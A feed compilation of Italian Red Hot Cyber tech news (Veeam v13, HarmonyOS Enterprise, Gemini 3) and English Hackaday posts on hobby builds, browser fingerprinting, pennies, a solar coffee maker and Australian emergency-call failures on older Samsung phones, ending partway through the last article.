Affidata a più di 550.000 clienti, Veeam Data Platform è una soluzione unificata che garantisce protezione avanzata dei dati, resilienza ai ransomware basata sull’IA e ripristino senza interruzioni su ambienti fisici, virtuali e cloud, assicurando che i dati delle organizzazioni siano sempre sicuri, disponibili e affidabili. Grazie a un’architettura moderna della piattaforma, intelligenza potenziata dall’IA, un ampio modello di integrazione degli hypervisor e nuove funzionalità di sicurezza all’avanguardia nel settore, Veeam Data Platform v13 rappresenta un salto rivoluzionario – aiutando le organizzazioni a rimanere un passo avanti alle minacce, eliminare il lock-in e mantenere i dati sempre disponibili, recuperabili e pronti per i carichi di lavoro del futuro.

Veeam Data Platform v13 introduce la sicurezza intelligente e la protezione dai ransomware più avanzate del settore. Le principali innovazioni includono:

• Recon Scanner 3.0 – Sicurezza Trasformativa, Analisi forense senza eguali: basato su Coveware by Veeam, Recon Scanner 3.0 è ora integrato direttamente in Veeam Data Platform, ridefinendo la visibilità in tempo reale delle minacce operative per le organizzazioni.
• Segnala comportamenti sospetti degli avversari sugli endpoint monitorati, inclusi attacchi brute force, attività file sospette e connessioni di rete inattese.
• Triage Inbox consolidata consente alle organizzazioni di visualizzare, ordinare e gestire tutte le attività sospette in un unico luogo, con valutazioni di gravità e approfondimenti comportamentali.
• Integrazione fluida con Veeam ONE Threat Center fornisce analisi in tempo reale e visualizzazione delle minacce direttamente sui cruscotti di sicurezza.
• Regole di soppressione e risultati contestualizzati aiutano i team a effettuare il triage più rapidamente e a ridurre il sovraccarico di alert.
• Integrazione con Microsoft Sentinel correla le informazioni di Recon Scanner con segnali di minaccia più ampi per un rilevamento, un’investigazione e una risposta unificati.
• Raccolta di dati forensi dagli ambienti Veeam e mappatura dei risultati al framework MITRE ATT&CK, offrendo un contesto sulle minacce senza precedenti.
• Agente AI per l’analisi dei malware basata sull’intelligenza Veeam: l’analisi avanzata guidata dall’IA rileva, classifica e segnala automaticamente malware e attività sospette, fornendo informazioni operative e indicazioni per la remediation, garantendo che i ripristini siano affidabili e privi di contaminazioni.
• Controlli di sicurezza, identità e accesso di livello superiore: l’accesso con privilegi minimi e l’autenticazione centralizzata tramite SSO basato su SAML riducono l’esposizione e semplificano l’accesso sicuro.
• Immutable by Default: i backup sono immutabili per impostazione predefinita, in linea con le best practice per la protezione dai ransomware, proteggendo i punti di ripristino da modifiche non autorizzate.
• Integrazioni leader di settore per sicurezza e ITSM: integrazioni profonde con le principali piattaforme di sicurezza e operazioni IT – tra cui CrowdStrike, Palo Alto Networks, Splunk e ServiceNow – permettono di unificare rilevamento, investigazione e risposta.

Veeam Data Platform v13 rafforza le fondamenta di Veeam, offrendo copertura estesa dei carichi di lavoro e mobilità dei workload rapida, flessibile e affidabile – elementi fondamentali per l’adozione del cloud, il ripristino dai cyber-attacchi e la modernizzazione guidata dall’IA. Le principali innovazioni includono:

• Ripristino istantaneo su Microsoft Azure: vero ripristino istantaneo dei workload critici direttamente su Azure, consentendo un rapido ripristino in un ambiente “cleanroom” sicuro per convalidare la recuperabilità e ridurre al minimo i tempi di inattività.
• Copertura ampliata degli hypervisor: supporto per Scale Computing HyperCore già disponibile, con ulteriori piattaforme in arrivo, tra cui HPE Morpheus VM Essentials, Citrix XenServer, XCP-ng e altre.
• Ulteriori novità previste per il 2026, tra cui:
  
  • Supporto per OpenShift Virtualization: backup e ripristino nativi delle VM basati sull’host per Red Hat OpenShift Virtualization, ampliando il supporto già esistente tramite Veeam Kasten.
  • Universal Hypervisor Integration API: un framework di integrazione senza precedenti che consente a qualsiasi vendor di hypervisor di integrarsi nativamente con le capacità di backup e ripristino di Veeam tramite un’API standardizzata, garantendo la futura compatibilità degli ambienti dei clienti con le nuove tecnologie di virtualizzazione.

  
  

Veeam Data Platform v13 amplia l’impegno di Veeam verso semplicità, apertura ed efficienza dei costi – offrendo alta disponibilità, gestione moderna e flessibilità di deployment senza appliance hardware proprietarie o architetture vincolanti. Le principali innovazioni includono:

• Veeam Software Appliance con alta disponibilità: appliance Linux preconfigurata, sicura e pronta all’uso, che si installa in pochi minuti, si aggiorna automaticamente, elimina l’onere della gestione del sistema operativo e ora supporta l’alta disponibilità per operazioni continue – tutto senza vincoli hardware, offrendo significativi risparmi rispetto alle appliance tradizionali dei competitor.
• Console Web Moderna: nuova interfaccia utente basata su browser e ospitata dal cliente, che semplifica la configurazione, riduce i requisiti infrastrutturali e rende più efficiente la gestione quotidiana, offrendo un’esperienza moderna e intuitiva.

“In Veeam, proteggere i dati dei nostri clienti non è solo una promessa: è la nostra missione,” ha dichiarato Anand Eswaran, CEO di Veeam Software. “Con Veeam Data Platform v13 stiamo ridefinendo lo standard per la resilienza dei dati. Offriamo alle organizzazioni l’intelligenza, l’automazione e la flessibilità necessarie per anticipare gli attacchi informatici, eliminare il lock-in e innovare senza timori. v13 rappresenta un momento cruciale per il futuro dei dati e della cyber resilienza, gettando anche le basi tecnologiche per il prossimo capitolo di Veeam: una piattaforma unificata di gestione dati e IA che integra protezione, sicurezza, governance e affidabilità dell’IA in un’unica esperienza intelligente.”

Disponibilità

Veeam Data Platform v13 è disponibile da subito attraverso la rete globale di partner autorizzati, rivenditori e distributori Veeam. Veeam Recon Scanner 3.0 è ora incluso in Veeam Data Platform Premium e sarà presto disponibile anche per i partner Veeam Cloud & Service Provider (VCSP). Per maggiori informazioni, visita www.veeam.com.

VeeamON Global Launch Virtual Event

Non perdere il VeeamON Global Launch Virtual Event il 19 novembre, dove Veeam Data Platform v13 e il nuovo Veeam Recon Scanner saranno mostrati in azione. Interagisci con i leader di Veeam, connettiti con esperti del settore e scopri come le organizzazioni possono raggiungere nuovi livelli di resilienza e sicurezza dei dati. Registrati gratuitamente su www.veeam.com/veeamon-global-launch.

Dichiarazioni e risorse a supporto

“Veeam Data Platform v13, con l’integrazione di Recon Scanner 3.0, trasforma radicalmente la sicurezza e la resilienza per i clienti, offrendo capacità avanzate di rilevamento e intelligence forense per anticipare le minacce informatiche. Questa potente combinazione consente alle organizzazioni di accelerare il ripristino grazie a backup “puliti” e automazione guidata dall’IA, garantendo continuità operativa e conformità. Per i partner, la nuova offerta rappresenta un’opportunità significativa, fornendo una soluzione leader di mercato, ad alto valore aggiunto, che semplifica il deployment e offre ai clienti la fiducia e la sicurezza necessarie nell’era digitale.” – Ron Westfall, Vice President, Infrastructure and Networking, HyperFRAME Research

“Veeam Data Platform v13 ci ha permesso di semplificare e centralizzare tutto. È pronta all’uso fin da subito, il che ha reso l’installazione estremamente semplice, e ha reso il nostro ambiente molto più facile da gestire. Per quanto riguarda la difesa informatica, dobbiamo essere impeccabili al 100%, perché agli attaccanti basta avere successo una sola volta. Il nuovo modello di deployment di Veeam ci aiuta a ottenere una sicurezza solida, ma allo stesso tempo fluida.” – Joe Moffitt, Principle Technical Architect, Darktrace

“La partnership tra Scale Computing e Veeam rappresenta più di una semplice integrazione: sta contribuendo a risolvere il problema delle interruzioni operative. Man mano che le organizzazioni si allontanano dagli hypervisor legacy, richiedono infrastrutture più semplici e autonome che non compromettano la resilienza. Insieme a Veeam, Scale Computing offre un’alternativa moderna che combina la piattaforma di virtualizzazione self-healing di Scale Computing con la protezione dei dati più affidabile del settore, permettendo ai team IT di riconquistare il controllo rispetto a complessità, costi e lock-in.” – Craig Theriac, Vice President of Product Management, Scale Computing

A proposito di Veeam Software

Veeam®, leader globale numero uno nel mercato della resilienza dei dati, ritiene che ogni azienda dovrebbe essere in grado di riprendersi rapidamente dopo una interruzione, con la certezza e il controllo di avere sempre accesso a tutti i propri dati, ovunque e in qualsiasi momento. Veeam definisce questo concetto resilienza radicale, e ci impegniamo costantemente a creare soluzioni innovative per aiutare i nostri clienti a raggiungerla.

Le soluzioni Veeam sono progettate appositamente per garantire la resilienza dei dati, offrendo backup, ripristino, portabilità, sicurezza e intelligence dei dati. Grazie a Veeam, i responsabili IT e della sicurezza possono dormire sonni tranquilli, sapendo che le loro applicazioni e i loro dati sono protetti e sempre disponibili, su cloud, ambienti virtuali, fisici, SaaS e Kubernetes.

Con sede a Seattle e uffici in oltre 30 Paesi, Veeam protegge più di 550.000 clienti in tutto il mondo, tra cui il 67% delle aziende Global 2000, che si affidano a Veeam per mantenere in funzione il loro business. La resilienza radicale inizia con Veeam. Scopri di più su  www.veeam.com o segui Veeam su LinkedIn @veeam-software e X @veeam.

Per richieste media relative a Veeam, contattare: Veeam.PR.Global@veeam.com.

L'articolo Veeam lancia Data Platform v13 e ridefinisce lo standard per la cyber resilienza e la protezione avanzata dei dati proviene da Red Hot Cyber.

Il 19 novembre Huawei ha presentato i nuovi sviluppi della linea HarmonyOS destinata al settore office, durante un incontro tecnico dedicato ai partner istituzionali e alle imprese. L’azienda ha confermato che i PC basati su HarmonyOS hanno raggiunto l’autonomia completa sull’intera catena di fornitura e ha introdotto due novità rilevanti: l’avvio della fase beta di HarmonyOS Enterprise Edition e l’imminente arrivo del laptop commerciale Huawei HM740.

L’evento, aperto dall’intervento di Zhu Dongdong, presidente della divisione Huawei dedicata a tablet e PC, ha evidenziato la volontà del gruppo di accelerare l’adozione del sistema operativo nel comparto professionale.

Secondo Zhu, il lavoro di sviluppo condotto negli ultimi anni ha permesso a Huawei di costruire una piattaforma competitiva su più livelli – hardware, sistema operativo ed ecosistema applicativo – con l’obiettivo di offrire soluzioni affidabili a enti pubblici e aziende.

HarmonyOS Enterprise Edition, basato su HarmonyOS 6, è stato progettato per rispondere alle esigenze tipiche degli ambienti governativi e corporate. Tra le principali funzionalità si segnala la presenza di due spazi digitali separati, uno professionale e uno personale, gestibili tramite un semplice gesto sullo schermo. L’isolamento fisico tra i due ambienti garantisce la protezione dei dati aziendali senza incidere sull’operatività quotidiana dei dipendenti. Il sistema introduce inoltre un meccanismo di distribuzione a latenza zero, che consente di automatizzare la configurazione dei dispositivi dal primo avvio, riducendo in modo significativo il carico delle attività IT.

Sul fronte dell’intelligenza artificiale, la piattaforma integra una versione avanzata dell’assistente Xiaoyi, che supporta funzioni dedicate al lavoro d’ufficio: annotazioni intelligenti, analisi guidate, gestione della conoscenza interna e assistenza alla produzione documentale. A questo si aggiungono le capacità di collaborazione distribuita tra dispositivi, già validate in ambito consumer, e la compatibilità con oltre un migliaio di periferiche, elemento utile per valorizzare le dotazioni già presenti nelle organizzazioni.

youtube.com/embed/qNqQmvMFUKw?…

Parallelamente, il nuovo laptop HM740 si prepara a entrare nel mercato come dispositivo pensato per contesti governativi e professionali. Il modello è frutto di un’integrazione profonda tra hardware e software, con ottimizzazioni dedicate al sistema HarmonyOS per garantire stabilità, sicurezza ed efficienza operativa.

Huawei sottolinea che queste soluzioni mirano a superare la tradizionale competizione basata sulle sole specifiche tecniche dei PC commerciali, puntando invece su un approccio integrato che combina sicurezza di sistema e funzioni intelligenti. L’azienda presenta questa direzione come una possibile ridefinizione del valore del PC professionale: non più soltanto uno strumento da ufficio, ma un componente strategico dei processi di digitalizzazione aziendale.

Secondo i dati condivisi nel corso dell’incontro, Huawei ha fornito servizi a oltre 10.000 imprese, accumulando più di 2.700 brevetti legati allo sviluppo di HarmonyOS. L’esperienza maturata in settori come pubblica amministrazione, finanza e manifattura ha contribuito alla definizione di soluzioni calibrate su esigenze reali, sostenute da cinque anni di ricerca e dal lavoro di oltre 10.000 ingegneri.

Con il lancio della versione enterprise del sistema operativo e l’arrivo del nuovo HM740, Huawei considera aperto un nuovo ciclo di evoluzione del mercato dei PC commerciali, basato su indipendenza tecnologica, collaborazione intelligente e un ecosistema in rapida espansione.

L'articolo Huawei presenta HarmonyOS e il nuovo laptop HM740. Microsoft Office a rischio? proviene da Red Hot Cyber.

Google ha annunciato il lancio di Gemini 3, la nuova generazione del suo modello di punta di intelligenza artificiale, che l’azienda sta integrando nella ricerca, nell’app Gemini, nei servizi cloud e negli strumenti per sviluppatori. Il management di Google definisce Gemini 3 il modello più intelligente della sua gamma e il prossimo passo verso l’intelligenza artificiale generale (AGI).

Quasi due anni fa, l’azienda ha lanciato la cosiddetta era Gemini e da allora la portata dell’adozione dell’intelligenza artificiale è cresciuta in modo significativo. Secondo Google, la modalità Panoramica AI nella ricerca raggiunge ora circa 2 miliardi di utenti al mese, l’app Gemini sta raggiungendo 650 milioni di utenti attivi al mese, oltre il 70% dei clienti di Google Cloud utilizza già i servizi di intelligenza artificiale dell’azienda e circa 13 milioni di sviluppatori hanno lavorato con modelli generativi.

Risultati entusiasmanti dai test della community AI

Ogni generazione della famiglia Gemini si è basata sulla precedente. La prima versione ha introdotto il supporto per lavorare con vari tipi di dati e contesti estesi, la seconda ha gettato le basi per le cosiddette funzionalità basate su agenti e ha migliorato le capacità di ragionamento del modello, e Gemini 2.5 ha mantenuto il primo posto nella popolare classifica LMArena per diversi mesi. Ora, Gemini 3 combina questi progressi in un unico core e si prevede che comprenderà meglio le query complesse degli utenti, considererà il contesto e l’intento e, in generale, agirà come un conversatore digitale più attento.

Google afferma che Gemini 3 Pro raggiunge risultati record in numerosi benchmark di settore per logica, matematica ed elaborazione dei dati, superando significativamente la generazione precedente, la 2.5 Pro.

In test come GPQA Diamond e Humanity’s Last Exam, il modello dimostra capacità di ragionamento paragonabili a quelle di livello esperto e, in set di problemi matematici specializzati, raggiunge nuovi livelli per i modelli di frontiera. L’azienda sottolinea anche i suoi progressi nei test multimodali, che considerano simultaneamente testo, immagini e video.

Gli sviluppatori mettono l’accento non solo sui “numeri in una tabella”, ma anche sul comportamento del modello in una tipica conversazione. Google afferma che Gemini 3 si impegna a fornire risposte brevi e pertinenti, evitando complimenti vuoti e cliché, e puntando invece a fornire risposte oneste e utili che aiutino a comprendere l’argomento o a vedere il problema da una nuova prospettiva.

Un modello progettato da Zero

Una delle caratteristiche principali di Gemini 3 è legata all’apprendimento. Il modello è stato progettato fin da zero come multimodale: può elaborare simultaneamente testo, immagini, video, audio e codice, e la sua finestra di contesto da un milione di token gli consente di gestire set di dati estremamente lunghi.

Google cita esempi di come Gemini 3 “decifra” vecchie ricette scritte a mano, le traduce da diverse lingue e le compila in un ricettario di famiglia, trasforma articoli scientifici e lezioni lunghe ore in appunti e flashcard interattivi e analizza video di allenamenti sportivi, evidenziando errori comuni e suggerendo un piano di allenamento.

Il secondo principale ambito di applicazione è lo sviluppo software. Gemini 3 si posiziona come il miglior modello di Google fino ad oggi per il cosiddetto vibe coding, in cui lo sviluppatore descrive ciò che vuole ottenere e l’intelligenza artificiale si occupa di una parte significativa della programmazione di routine e dell’assemblaggio dell’interfaccia. Secondo l’azienda, Gemini 3 è in cima a classifiche come WebDev Arena ed è significativamente migliore dei suoi predecessori nella gestione di attività che richiedono non solo la scrittura di codice, ma anche il corretto utilizzo di strumenti, del terminale e delle API esterne.

Un ambiente “multimodale” completo

In concomitanza con il lancio di Gemini 3, Google ha presentato la sua nuova piattaforma, Google Antigravity. Questo ambiente di sviluppo basato su agenti eleva l’intelligenza artificiale dalla “chat laterale” al primo piano, consentendole di accedere direttamente all’editor di codice, al terminale e al browser integrato.

L’agent può pianificare il lavoro, suddividere le attività in fasi, eseguire più processi in parallelo, testare e convalidare il proprio codice e lasciare artefatti dettagliati come piani, log e screenshot in modo che gli utenti possano vedere esattamente cosa ha fatto il sistema. Antigravity utilizza non solo Gemini 3 Pro, ma anche il modello specializzato Gemini 2.5 Computer Use per la gestione del browser, nonché il motore proprietario Nano Banana per la generazione e l’editing delle immagini.

Per i compiti più complessi, Google sta sviluppando una modalità Gemini 3 Deep Think dedicata. L’azienda afferma che è ancora più efficace nel gestire problemi non convenzionali che richiedono ragionamento e ricerca di soluzioni in assenza di una risposta corretta ovvia. Deep Think è attualmente sottoposto a ulteriori test di sicurezza ed è disponibile per un numero limitato di tester. In seguito sarà disponibile per gli abbonati a Google AI Ultra.

Una sezione separata dell’annuncio è dedicata alla sicurezza. Google afferma che Gemini 3 è stato sottoposto a test più approfonditi tra tutti i suoi modelli, rendendolo più resiliente ai solleciti malevoli, meno soggetto a induzioni da parte degli utenti e più protetto da scenari come gli attacchi informatici automatizzati. Per valutare i rischi, Google ha coinvolto non solo i propri team, ma anche esperti esterni, tra cui agenzie governative britanniche competenti e società indipendenti che hanno sottoposto a revisione il modello.

Gemini 3 è già in fase di distribuzione

Il modello è disponibile nell’app Gemini, in modalità AI nella ricerca per gli abbonati a pagamento di Google AI Pro e Ultra, negli strumenti di sviluppo dell’API Gemini in AI Studio e nell’utilità di comando Gemini CLI. Per i clienti aziendali, sarà disponibile tramite Vertex AI e il pacchetto Gemini Enterprise. Alcune funzionalità dell’agente, come Gemini Agent per la posta elettronica, sono già disponibili in prova per gli utenti con abbonamenti avanzati, mentre le funzionalità Deep Think verranno aggiunte gradualmente al completamento dei test.

Google ora ha dalla sua non solo nuovi record di benchmark, ma anche una dimensione più ampia: l’azienda implementerà immediatamente il modello nella ricerca e nei prodotti chiave, dove conta miliardi di utenti. La domanda è quanto sarà utile questo aggiornamento per le persone comuni e gli sviluppatori, e quanto velocemente Gemini 3 potrà trasformarsi da una spettacolare dimostrazione di capacità di intelligenza artificiale in uno strumento di lavoro davvero indispensabile.

L'articolo Google lancia Gemini 3, il modello di intelligenza artificiale più avanzato proviene da Red Hot Cyber.

When the iconic “Boing Ball” first debuted 40 years ago, it was a wonder to behold. There was nothing like it in the home compuing world upto that time, and it showed that Commodore’s new “Amiga” was a powerhouse sure to last the test of time. Forty years later, the Amiga as we knew it then might not be with us anymore, but [Mark Wilson] is recreating its iconic demo on a microcontroller– but not just any microcontroller. “AMeagerBall” is an Arduino Uno exclusive, and it even tells the time.

Like the original “Boing Ball”, the demo is running at 320×240, though on a touch LCD shield instead of a CRT. Unlike some microcontrollers, the Uno doesn’t have the horsepower to just brute-force emulate a 1980s home computer, so [Mark] has had to recreate the boing ball from scratch. He’s not doing it with any graphics libraries, either. On the Uno that would be too slow, so [Mark] is driving the LCD directly to its appropriate registers, to stay close enough to the metal to make it work. That means if you’re going to try the code on his GitHub repository, you’ll need to be sure to use matching hardware or be prepared to port it.

One of the things about Amiga’s demo that was so impressive is that it hardly made use of the CPU, allowing the Workbench to be pulled up while the ball bounced. That’s not the case here, as the UNO doesn’t have any extra graphics chips. Still, [Mark] was able to squeeze enough horsepower out of everyone’s favourite ATmega to present us with an Amiga-styled clock– either analog, digital, or in the workbench title bar in that iconic blue-and-white. To keep the clock accurate, he’s squeezed an RTC module in, too. Lovely! The different clocks can be accessed via the touchscreen.

Oh, did we forget to mention that the touchscreen is implemented? This certainly stretches the hardware far enough to be considered a demo. If just a bouncing ball doesn’t work the UNO hard enough for you, try booting Linux.

This isn’t the first bouncing ball demo we’ve seen on a microcontroller: here are four of them bouncing in an ATtiny85.

youtube.com/embed/Nls-YfQCngo?…

hackaday.com/2025/11/19/amiga-…

Amidst the glossy marketing for VPN services, it can be tempting to believe that the moment you flick on the VPN connection you can browse the internet with full privacy. Unfortunately this is quite far from the truth, as interacting with internet services like websites leaves a significant fingerprint. In a study by [RTINGS.com] this browser fingerprinting was investigated in detail, showing just how easy it is to uniquely identify a visitor across the 83 laptops used in the study.

As summarized in the related video (also embedded below), the start of the study involved the Am I Unique? website which provides you with an overview of your browser fingerprint. With over 4.5 million fingerprints in their database as of writing, even using Edge on Windows 10 marks you as unique, which is telling.

In the study multiple VPN services were used, each of which resulted in exactly the same fingerprint hash. This is based on properties retrieved from the browser, via JavaScript and other capabilities exposed by the browser, including WebGL and HTML5 Canvas.

Next in the experiment the set of properties used was restricted to those that are more deterministic, removing items such as state of battery charge, and creating a set of 28 properties. This still left all 83 work laptops at the [RTINGS.com] office with a unique fingerprint, which is somewhat amazing for a single Canadian office environment since they should all use roughly the same OS and browser configuration.

As for ways to reduce your uniqueness, browsers like Brave try to mix up some of these parameters used for fingerprinting, but with Brave being fairly rare the use of this browser by itself makes for a pretty unique identifier. Ultimately being truly anonymous on the internet is pretty hard, and thus VPNs are mostly helpful for getting around region blocks for streaming services, not for obtaining more privacy.

youtube.com/embed/pJOpHSPkWMo?…

hackaday.com/2025/11/19/browse…

Whenever there’s a superlative involved, you know that degree of optimization has to leave something else on the table. In the case of [PegorK]’s f32, the smallest ESP32 dev board we’ve seen, the cost of miniaturization is GPIO.

There’s only one GPIO pin broken out, and it’s pre-wired to an LED. That’s the bad news, and depending on what you want an ESP32 for, it might not phase you at all. What is impressive here, if not the number of I/O pins, is the size of the board: at 9.85 mm x 8.45 mm barely overhangs the USB-C socket that takes up one side of the board.
Pegor provides this helpful image in the readme so you know what you’re getting into with the 01005 resistors.
In order to get the ESP32-C3FH4 onto such a tiny board, all of the other support hardware had to be the smallest possible sizes– including resistors in 01005. If you don’t speak SMD, one could read that number code as “oh god too small” — at 0.4 mm x 0.2 mm it’s as minuscule as you’ll find– and [Pegor] hand soldered them.

OK, he did use a hot plate for the final step, but he did tin the pads manually with a soldering iron, which is still impressive. Most of us probably would have taken PCBWay up on their offer of assembly services, but not [Pegor]. Apparently part of the reason for this project was that he was looking for an excuse to use the really small footprint components.

Aside from leaving out GPIO and needing too-small SMD components, [Pegor] admits that pesky little details like antenna matching circuits and decoupling capacitors had to get cut to make the tiny footprint, so this board might be more of a stunt than anything practical. So what can you do with the smallest ESP32 board? Well, [Pegor] put up a basic web interface up to get you started blinking the built-in LED; after that, it’s up to you. Perhaps you might fancy a teeny-tiny minecraft server? If you can stand to increase the volume a little bit, we’ve seen how to hack a C3 for much better wifi performance.

Thanks to [Pegor] for the tip, and remember– submit your projects, big or small, we read ’em all!

hackaday.com/2025/11/19/possib…

When Stranger Things premiered in 2016, it was a cultural force. Foreign DJs gushed over the lush 80s soundtrack, fashionistas loved the clothing, and the world became obsessed with the idea of using Christmas lights to communicate across material planes. [kyjohnso] has recreated that experience with the technology of today.

If you haven’t watched the show — Joyce Byers is trying to communicate with her son Will, who just so happens to be stuck in another plane of existence called the Upside Down. She screams questions at her living room wall, upon which hangs a series of Christmas lights, marked with the letters A to Z. Will is able to communicate back by causing the lights to flash, one letter at a time.

This build works a little differently. You basically type a message into a terminal on a Raspberry Pi, and it gets sent to a large language model—namely, the Claude API. The response from Claude (or Will Byers, if you’re imagining) is then flashed out on a WS2812B set of LED Christmas lights on the wall. [kyjohnso] added dramatic pauses whenever there’s a space in the output, somewhat replicating the dramatic elements of the show itself. Files are on GitHub for the spooky and curious.

It’s a neat build that would be a hit at any Halloween party. We can’t imagine how much more immersive it would be if paired with a speech-to-text engine so you could actually scream at the thing like a distraught Midwestern parent who has just lost her youngest child. It’s all about committing to the bit; if you build such a thing, don’t hesitate to notify the tipsline!

hackaday.com/2025/11/19/build-…

This week Jonathan chats with Kevin, Colin, and Curtis about Cataclysm: Dark Days Ahead! It’s a rogue-like post-apocalyptic survival game that you can play in the terminal, over SSH if you really want to! Part of the story is a Kickstarter that resulted in a graphics tile-set. And then there’s the mods!

• cataclysmdda.org/
• github.com/CleverRaven/Catacly…

youtube.com/embed/XzS8cOnVFgg?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or have the guest contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2025/11/19/floss-…

We aren’t here to praise the penny, but rather, to bury it. The penny, and its counterparts, have been vanishing all around the world as the cost of minting one far outweighs its value. But hackers had already lost a big asset: real copper pennies, and now even the cheaply made ones are doomed to extinction.

If you check your pockets and find a pre-1982 penny, it’s almost all copper. Well, 95% of its slightly-more-than-3-gram heft is pure copper. Since then, the copper penny’s been a fraud, weighing 2.5 g and containing only a 2.5% copper plate over a zinc core. During WWII, they did make some oddball steel pennies, but that was just a temporary measure.

Penny Science

If you are a certain age, you might remember building a “voltaic pile.” These primitive batteries use pennies, cardboard soaked in vinegar, and aluminum foil. Granted, it wasn’t very practical, so raiding your couch for change to make a battery was never really practical, but it was a fun science experiment. There are dozens of YouTube videos showing this popular experiment, including the [ScienceBuddies] video below.

youtube.com/embed/JcRRTHkAl6A?…

Old pennies were also a cheap and easy source of copper. Vinegar or lemon juice and some voltage made it simple to copperplate another metal object, like a nail. Copper also makes a good heatsink. We’ve seen Raspberry Pis and similar boards with heatsinks that cost an integer number of pennies, because that’s all they were. An oxidized penny shows up in some foxhole radios. They were also handy little weights if you made a balance or for taming a wobbly ceiling fan.

If you were a real kid chemist, you might have done the classic trick of turning a penny into “silver” and then “gold.” You used not-so-lovely-to-handle sodium hydroxide, some zinc, and a flame to actually convert the penny to brass. It wasn’t really a precious metal, but still a good trick if you were a kid with a chemistry set. As the video from [Simon] below shows, that will still work with the copperplate pennies.

youtube.com/embed/wmd2teoPUu0?…

New Pennies

Not that you can’t have fun with zinc pennies. If you scratch the plating a bit and dip it in HCL, the zinc core fizzes away. What’s left is a hollow copper penny. If you don’t like using HCL, we hear you can do it over a stove and simply melt the zinc. We wouldn’t try either one of those without a vent hood and an unhealthy disregard for your personal safety, so, you know, don’t do that. But know that you could. [Craig] shows how to remove the zinc or the copper in the video below.

youtube.com/embed/5Cf0gH2LtiE?…

The legality of all this has always been a little suspect. Since 2006, it has been illegal to melt down coins for their metal value. Technically, using it in a science class probably won’t bring the Treasury agents swooping into your classroom, but you have been warned.

Household Hacker

Of course, it is going to take some time for all the pennies to really vanish. There are plenty of them, and you can still get around a hundred for a buck. But when they are gone, what other household items are easy to hack for science? Aluminum foil, maybe? Tell us your favorite in the comments.

Whether they were copper slugs or thinly plated zinc tokens, pennies were a weirdly perfect hacker material: cheap, conductive, sacrificial, and everywhere. We’ll miss them.

Featured image: “wealth of pennies” by [Reza]

hackaday.com/2025/11/19/hacker…

The folks at Low Tech Magazine are here again, this time with a solar powered coffee maker. Lest you think of a large parabolic mirror with a pot at its focus, in this case the device is much more friendly. It’s a table-top appliance that relies upon a 100 W 12 V panel for its operation.

They make the point that an electric coffee pot requires at least 300 W to work, so what’s the secret? In this case, insulation, as a standard moka pot is placed within a nichrome heating element set in mortar and surrounded by cork. On the outside are tiles, though they appear largely ornamental and the write-up suggests you could experiment with other materials to serve as an enclosure.

It appears to be an effective coffee maker, with the significant caveat that it’s hardly fast. In full sunlight the first pot takes over an hour to brew, with subsequent ones once it’s up to temperature being somewhat faster. But you can’t argue with the idea of free power, even if your favourite caffeinated beverage may now take a while to appear.

We like this idea, despite its slow brewing. We’ve featured Low Tech Magazine before, not least in their solar powered oven.

hackaday.com/2025/11/19/damn-f…

We’re taught how to call emergency numbers from a young age; whether it be 911 in the US, 999 in the UK, or 000 in Australia. The concept is simple—if you need aid from police, fire, or ambulance, you pick up a phone and dial and help will be sent in short order.

It’s a service many of us have come to rely on; indeed, it’s function can swing the very balance between life or death. Sadly, in Australia, that has come to pass, with a person dying when their Samsung phone failed to reach the Triple Zero (000) emergency line. It has laid bare an obscure technical issue that potentially leaves thousands of lives at risk.

Peril

Triple Zero is the number to dial for Australian emergency services. Credit: TripleZero.gov.au
Australia’s Triple Zero emergency service becoming a hot-button issue. September 2025 saw widespread failures of emergency calls on the Optus network, an incident that was tied to at least three deaths of those unable to reach help. A series of further isolated cases have drawn more attention to edge case failures that have prevented people from reaching emergency services.

A bigger potential issue with the Triple Zero service has since bubbled up with the increased scrutiny on the system’s operation. Namely, the fact that a huge swathe of older Samsung smartphones cannot be trusted to successfully call 000 in an emergency. The potential issue has been on the radar of telcos and authorities since at least 2024. Since then, on November 13 2025, an individual in Sydney passed away after their phone failed to dial the emergency line. Their phone was using a Lebara SIM card, as managed by TPG and using the Vodafone network, when the incident occurred. Subsequent investigation determined that the problem was due to issues already identified with a wide range of Samsung phones.

The issue surrounds the matter of Australia’s shutdown of 3G phone service, which took place from 2023 to 2024. If you had a 3G phone, it would no longer be able to make any calls after the networks were shut down. Common sense would suggest that phones with 4G and 5G connectivity would be fine going forward. However, there was a caveat. There were a number of phones sold that offered 4G or 5G data connections, but could not actually make phone calls on these networks. This was due to manufacturers failing to implement Voice-over-LTE (VoLTE) functionality required to carry voice calls over 4G LTE networks. Alternatively, in some cases, the 4G or 5G handset could make VoLTE calls, but would fail to make emergency calls in certain situations.

Communication Breakdown

It all comes down to the way voice calls work on 4G and 5G. Unlike earlier 2G and 3G cellular networks, 4G and 5G networks are data only. Phone calls are handled through VoLTE, which uses voice-over-IP technology, or using Voice over NR (VoNR) in a purely 5G environment. Either way, the system is a data-based, packet-switched method of connecting a phone call, unlike the circuit-switched methods used for 2G and 3G calling.
Phones like the Galaxy S7 and S7 Edge are compatible with 4G networks. However, with the shutdown of 3G services, they cannot reliably make emergency voice calls on current Australian networks. Credit: GadgetsGuy, CC BY 3.0
The problem with this is that while 2G and 3G emergency calls worked whenever you had a tower nearby, VoLTE calling is more complex and less robust. VoLTE standards don’t guarantee that a given handset will be interoperable with all LTE networks, particularly when roaming. A given handset might only like IPv4, for example, which may be fine in its home region on its regular carrier. However, when roaming, or when doing an emergency call, that handset might find itself only in range of a different network’s towers, which only like IPv6, and thus VoLTE calling will fail. There are any number of other configuration mismatches that can occur between a handset and a network that can also cause VoLTE calling to fail.

Usually, when you’re in range of your phone’s home network with a modern 4G or 5G handset, you won’t have any problems. Your phone will use its VoLTE settings profile to connect and the emergency call will go through. After all, older models with no VoLTE support have by and large been banned from networks already. However, the situation gets more complex if your home network isn’t available. In those cases, it will look to “camp on” to another provider’s network for connectivity. In this case, if the phone’s VoLTE settings aren’t compatible with the rival network, the call may fail to connect, and you might find yourself unable to reach emergency services.

